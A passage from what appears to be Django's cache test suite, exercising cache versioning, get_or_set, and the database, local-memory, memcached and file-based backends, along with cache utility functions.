self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_version(self):
msg = (
"get_or_set() missing 1 required positional argument: 'default'"
if six.PY3
else 'get_or_set() takes at least 3 arguments'
)
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = six.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'tcp_nodelay': True},
))
def test_pylibmc_legacy_options(self):
deprecation_message = (
"Specifying pylibmc cache behaviors as a top-level property "
"within `OPTIONS` is deprecated. Move `tcp_nodelay` into a dict named "
"`behaviors` inside `OPTIONS` instead."
)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
self.assertEqual(len(warns), 1)
self.assertIsInstance(warns[0].message, RemovedInDjango21Warning)
self.assertEqual(str(warns[0].message), deprecation_message)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
def test_cache_write_unpicklable_type(self):
# This fails if not using the highest pickling protocol on Python 2.
cache.set('unpicklable', UnpicklableType())
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_enoent_errno_values(self):
with mock.patch.object(io, 'open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
